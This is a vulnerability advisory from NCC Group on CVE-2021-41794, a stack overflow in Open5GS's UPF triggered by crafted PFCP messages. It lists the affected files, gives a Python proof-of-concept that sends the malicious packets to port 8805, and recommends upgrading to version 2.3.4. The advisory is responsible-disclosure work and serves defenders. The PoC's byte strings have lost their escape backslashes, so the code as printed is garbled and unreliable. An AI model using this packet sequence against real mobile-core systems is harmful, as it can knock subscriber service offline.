Technical Advisory – Open5GS Stack Buffer Overflow During PFCP Session Establishment on UPF (CVE-2021-41794)

Vendor: Open5GS
Vendor URL: https://github.com/open5gs/open5gs
Versions affected: 1.0.0 to 2.3.3
Systems Affected: Linux
Author: mark.tedman[at]nccgroup[dot]com
Advisory URL / CVE Identifier: CVE-2021-41794
Risk: CVSSv3.1: 8.2 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)

Summary

When connecting to the UPF port for the PFCP protocol (8805) and sending an Association Setup Request followed by a Session Establishment Request with a PDI Network Instance set to ‘internet’, it causes a stack corruption to occur.

Impact

Exploitation of this vulnerability would lead to denial of service for the subscriber’s equipment.

Details

Sending a PFCP Association Setup followed by a PFCP Session Establishment Request with the settings detailed below is enough to cause the stack overflow.  The issue is caused by the function ogs_fqdn_parse in the file lib/core/ogs-3gpp-types.c calculating a length value used in a memcpy without validating it.

Directly affected files:

• Function: ogs_fqdn_parse in /lib/core/ogs-3gpp-types.c
• /lib/nas/5gs/ies.c
• /lib/nas/eps/ies.c
• /lib/pfcp/handler.c
• /lib/pfcp/types.c
• /lib/sbi/nnrf-handler.c
• /src/mme/sgsap-handler.c
• /src/sgwc/s11-handler.c
• /src/smf/context.c

The following python script can be used to replicate the issue:

#!/usr/bin/env python3

import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(1.0)

pfcp_association_setup_req = b'x20x05x00x1ax00x00x01x00x00x3cx00x05x00xc0xa8x3fx88x00x60x00x04x5fxf4x38x25x00x59x00x01x00'

pfcp_session_establishment_req = b'x21x32x00xefx00x00x00x00x00x00x00x00x00x00x02x00x00x3cx00x05x00xc0xa8x3fx88x00x39x00x0dx5ax00x00x00x00x00x00x00x01xc0xa8x3fx88x00x01x00x46x00x38x00x02x00x01x00x1dx00x04x1fx00x00x00x00x02x00x27x00x14x00x01x00x00x15x00x09x01x00x00x00x0axc0xa8x3fx88x00x16x00x08x69x6ex74x65x72x6ex65x74x00x5dx00x05x02x2dx2dx00x02x00x5fx00x01x00x00x6cx00x04x00x00x00x01x00x01x00x34x00x38x00x02x00x02x00x1dx00x04x1fx00x00x00x00x02x00x1ax00x14x00x01x01x00x16x00x08x69x6ex74x65x72x6ex65x74x00x5dx00x05x06x2dx2dx00x02x00x6cx00x04x00x00x00x02x00x03x00x16x00x6cx00x04x00x00x00x01x00x2cx00x01x02x00x04x00x05x00x2ax00x01x01x00x03x00x24x00x6cx00x04x00x00x00x02x00x2cx00x01x02x00x04x00x13x00x2ax00x01x00x00x54x00x0ax01x00x00x00x00x0axc0xa8x3fx88x00x71x00x01x01'

sock.sendto(pfcp_association_setup_req, ('127.0.0.7', 8805))
try:
   sock.recv(65535)
except Exception as ex:
   print(f"Receive failed: {ex}")

sock.sendto(pfcp_session_establishment_req, ('127.0.0.7', 8805))
try:
   sock.recv(65535)
except Exception as ex:
   print(f"Receive failed: {ex}")

sock.close()

Recommendation

The function ogs_fqdn_parse needs to correctly calculate/validate the length used in the memcpy function.  This has been patched as of October 6^th 2021 (fix committed to main branch of Open5GS and released in version 2.3.4).

Users should update to the most recent version 2.3.4 or above of Open5GS.

Vendor Communication

29/09/2021: Initial email sent to Open5GS
29/09/2021: Open5GS replied with PGP Key
30/09/2021: Sent Technical Advisory to Open5GS
30/09/2021: Technical Advisory received by Open5GS
01/10/2021: Bug fixed by Open5GS
06/10/2021: Open5GS version 2.3.4 released - fixes bug

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  06/10/2021

Written by:  Mark Tedman